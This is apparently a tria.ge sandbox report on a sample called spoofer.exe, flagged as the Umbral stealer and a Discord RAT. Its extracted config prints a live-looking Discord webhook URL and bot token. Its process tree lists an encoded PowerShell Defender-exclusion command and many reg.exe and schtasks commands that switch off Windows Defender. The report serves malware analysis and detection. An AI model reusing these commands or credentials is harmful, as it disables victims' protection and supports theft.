Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 22:21
Static task
static1
Behavioral task
behavioral1
Sample
spoofer.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
spoofer.exe
Resource
win10v2004-20231222-en
General
-
Target
spoofer.exe
-
Size
442KB
-
MD5
d5a84036071756dee960de255bd6ab94
-
SHA1
83b439582a8f3392f18dde97b56d937c518b1cd2
-
SHA256
5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d
-
SHA512
fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779
-
SSDEEP
12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ
Malware Config
Extracted
umbral
https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50
Extracted
discordrat
-
discord_token
MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw
-
server_id
1196510448573489273
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000231ed-32.dat family_umbral behavioral2/memory/4448-35-0x000001F50DD20000-0x000001F50DD60000-memory.dmp family_umbral -
Discord RAT
A RAT written in C# using Discord as a C2.
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation spoofer.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cleaner.exe -
Executes dropped EXE 3 IoCs
pid Process 2648 cleaner.exe 4784 Spoofer.exe 4448 Woofer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\cleaner.exe spoofer.exe File created C:\Windows\Spoofer.exe spoofer.exe File created C:\Windows\Woofer.exe spoofer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4908 powershell.exe 4908 powershell.exe 4908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4784 Spoofer.exe Token: SeDebugPrivilege 4448 Woofer.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeIncreaseQuotaPrivilege 2620 wmic.exe Token: SeSecurityPrivilege 2620 wmic.exe Token: SeTakeOwnershipPrivilege 2620 wmic.exe Token: SeLoadDriverPrivilege 2620 wmic.exe Token: SeSystemProfilePrivilege 2620 wmic.exe Token: SeSystemtimePrivilege 2620 wmic.exe Token: SeProfSingleProcessPrivilege 2620 wmic.exe Token: SeIncBasePriorityPrivilege 2620 wmic.exe Token: SeCreatePagefilePrivilege 2620 wmic.exe Token: SeBackupPrivilege 2620 wmic.exe Token: SeRestorePrivilege 2620 wmic.exe Token: SeShutdownPrivilege 2620 wmic.exe Token: SeDebugPrivilege 2620 wmic.exe Token: SeSystemEnvironmentPrivilege 2620 wmic.exe Token: SeRemoteShutdownPrivilege 2620 wmic.exe Token: SeUndockPrivilege 2620 wmic.exe Token: SeManageVolumePrivilege 2620 wmic.exe Token: 33 2620 wmic.exe Token: 34 2620 wmic.exe Token: 35 2620 wmic.exe Token: 36 2620 wmic.exe Token: SeIncreaseQuotaPrivilege 2620 wmic.exe Token: SeSecurityPrivilege 2620 wmic.exe Token: SeTakeOwnershipPrivilege 2620 wmic.exe Token: SeLoadDriverPrivilege 2620 wmic.exe Token: SeSystemProfilePrivilege 2620 wmic.exe Token: SeSystemtimePrivilege 2620 wmic.exe Token: SeProfSingleProcessPrivilege 2620 wmic.exe Token: SeIncBasePriorityPrivilege 2620 wmic.exe Token: SeCreatePagefilePrivilege 2620 wmic.exe Token: SeBackupPrivilege 2620 wmic.exe Token: SeRestorePrivilege 2620 wmic.exe Token: SeShutdownPrivilege 2620 wmic.exe Token: SeDebugPrivilege 2620 wmic.exe Token: SeSystemEnvironmentPrivilege 2620 wmic.exe Token: SeRemoteShutdownPrivilege 2620 wmic.exe Token: SeUndockPrivilege 2620 wmic.exe Token: SeManageVolumePrivilege 2620 wmic.exe Token: 33 2620 wmic.exe Token: 34 2620 wmic.exe Token: 35 2620 wmic.exe Token: 36 2620 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3968 wrote to memory of 4908 3968 spoofer.exe 88 PID 3968 wrote to memory of 4908 3968 spoofer.exe 88 PID 3968 wrote to memory of 4908 3968 spoofer.exe 88 PID 3968 wrote to memory of 2648 3968 spoofer.exe 89 PID 3968 wrote to memory of 2648 3968 spoofer.exe 89 PID 3968 wrote to memory of 4784 3968 spoofer.exe 91 PID 3968 wrote to memory of 4784 3968 spoofer.exe 91 PID 3968 wrote to memory of 4448 3968 spoofer.exe 92 PID 3968 wrote to memory of 4448 3968 spoofer.exe 92 PID 2648 wrote to memory of 5044 2648 cleaner.exe 93 PID 2648 wrote to memory of 5044 2648 cleaner.exe 93 PID 5044 wrote to memory of 2304 5044 cmd.exe 95 PID 5044 wrote to memory of 2304 5044 cmd.exe 95 PID 4448 wrote to memory of 2620 4448 Woofer.exe 96 PID 4448 wrote to memory of 2620 4448 Woofer.exe 96 PID 5044 wrote to memory of 720 5044 cmd.exe 98 PID 5044 wrote to memory of 720 5044 cmd.exe 98 PID 5044 wrote to memory of 2848 5044 cmd.exe 99 PID 5044 wrote to memory of 2848 5044 cmd.exe 99 PID 5044 wrote to memory of 408 5044 cmd.exe 100 PID 5044 wrote to memory of 408 5044 cmd.exe 100 PID 5044 wrote to memory of 1184 5044 cmd.exe 103 PID 5044 wrote to memory of 1184 5044 cmd.exe 103 PID 5044 wrote to memory of 2624 5044 cmd.exe 102 PID 5044 wrote to memory of 2624 5044 cmd.exe 102 PID 5044 wrote to memory of 544 5044 cmd.exe 104 PID 5044 wrote to memory of 544 5044 cmd.exe 104 PID 5044 wrote to memory of 904 5044 cmd.exe 105 PID 5044 wrote to memory of 904 5044 cmd.exe 105 PID 5044 wrote to memory of 3860 5044 cmd.exe 106 PID 5044 wrote to memory of 3860 5044 cmd.exe 106 PID 5044 wrote to memory of 1660 5044 cmd.exe 107 PID 5044 wrote to memory of 1660 5044 cmd.exe 107 PID 5044 wrote to memory of 4632 5044 cmd.exe 130 PID 5044 wrote to memory of 4632 5044 cmd.exe 130 PID 5044 wrote to memory of 3600 5044 cmd.exe 129 PID 5044 wrote to memory of 3600 5044 cmd.exe 129 PID 5044 wrote to memory of 4940 5044 cmd.exe 128 PID 5044 wrote to memory of 4940 5044 cmd.exe 128 PID 5044 wrote to memory of 4944 5044 cmd.exe 109 PID 5044 wrote to memory of 4944 5044 cmd.exe 109 PID 5044 wrote to memory of 3136 5044 cmd.exe 108 PID 5044 wrote to memory of 3136 5044 cmd.exe 108 PID 5044 wrote to memory of 2776 5044 cmd.exe 110 PID 5044 wrote to memory of 2776 5044 cmd.exe 110 PID 5044 wrote to memory of 380 5044 cmd.exe 111 PID 5044 wrote to memory of 380 5044 cmd.exe 111 PID 5044 wrote to memory of 3432 5044 cmd.exe 112 PID 5044 wrote to memory of 3432 5044 cmd.exe 112 PID 5044 wrote to memory of 4000 5044 cmd.exe 113 PID 5044 wrote to memory of 4000 5044 cmd.exe 113 PID 5044 wrote to memory of 4132 5044 cmd.exe 114 PID 5044 wrote to memory of 4132 5044 cmd.exe 114 PID 5044 wrote to memory of 4732 5044 cmd.exe 117 PID 5044 wrote to memory of 4732 5044 cmd.exe 117 PID 5044 wrote to memory of 864 5044 cmd.exe 116 PID 5044 wrote to memory of 864 5044 cmd.exe 116 PID 5044 wrote to memory of 4796 5044 cmd.exe 115 PID 5044 wrote to memory of 4796 5044 cmd.exe 115 PID 5044 wrote to memory of 4176 5044 cmd.exe 127 PID 5044 wrote to memory of 4176 5044 cmd.exe 127 PID 5044 wrote to memory of 2168 5044 cmd.exe 125 PID 5044 wrote to memory of 2168 5044 cmd.exe 125 PID 5044 wrote to memory of 3160 5044 cmd.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\spoofer.exe"C:\Users\Admin\AppData\Local\Temp\spoofer.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\cleaner.exe"C:\Windows\cleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\466F.tmp\4670.tmp\4671.bat C:\Windows\cleaner.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:2304
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:720
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:2848
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f4⤵PID:408
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2624
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:1184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:544
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:904
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3860
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1660
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:3136
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:4944
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:2776
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:380
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:3432
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:4000
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:4132
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:4796
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:864
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:4732
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3160
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:3840
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:3412
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:3580
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:2096
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2168
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:4940
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:3600
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:4632
-
-
-
-
C:\Windows\Spoofer.exe"C:\Windows\Spoofer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\Woofer.exe"C:\Windows\Woofer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv ynVRKuLpTUmmVNuyUEi97w.0.21⤵PID:3412
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD537a937d63e6dcc8f8de4b8847d210546
SHA198ca34f1a7cf66d583822b83cd1c65a1fb7f1d4a
SHA256111ac48198ba45919584668ed9ad15010d316de7f1665f4d42ec249259f696bc
SHA512062046aca604cf5f329590b1a9ee317974b45f0bdc18f70b74489ece55737480cbb5544d1ced8f5d0e8c66af4b38085ac4e70f26dac2b6d6a50d26f9b36e2b46
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
78KB
MD5698d53d0e0b33c8eeec2dc5ee507e971
SHA1a4c4999c0aeeb2552ec063960a37a4296bf6eb02
SHA2563dbf21a8a065a297e0d16148f3931315e4e25e1872eed4fd9a256191571a223d
SHA5125c6ec88ee5b93476f522d87f8edd4b8a1ce78ea47b8ee7d320941a092b5943877ff3a639a00589d6d2e937a41019ad12408576c4223d7a9ac87826d3385abef5
-
Filesize
231KB
MD5c0922cfbf0bc3b88f4ab89146f1c5225
SHA1c9120012509c3942e0299c1c7eb9fe190b978917
SHA25659f283a7f4a7d50e13c963bb2ae0b3ebd0433bb73f2d582b2c9dd0e7564bce0d
SHA512d7aaed129723526b66eb8e7917e893426d035bb2583200680cc2683038203dfdd7d48d0deaece13ea4de7eefcd948a891e6f107d19dc0e5f64a0dd760f100b9f
-
Filesize
127KB
MD586cb66d7f7740d8ae241ff6dae24a963
SHA119aff29c5319ba0bcbab649d16412b5e27f3e07c
SHA256cea237087535cd1e6ed4c1fd199e9b297a2720eeac41eadd1976d2efda7bf9cf
SHA512b8d1839e669795b0506448a2de98992ceccc5e24b4e6fb8c81397d3991cbfe56f0e285878ffcfe10a186bf2833343566208ae8d8af7b8f39ddbd2f316a410322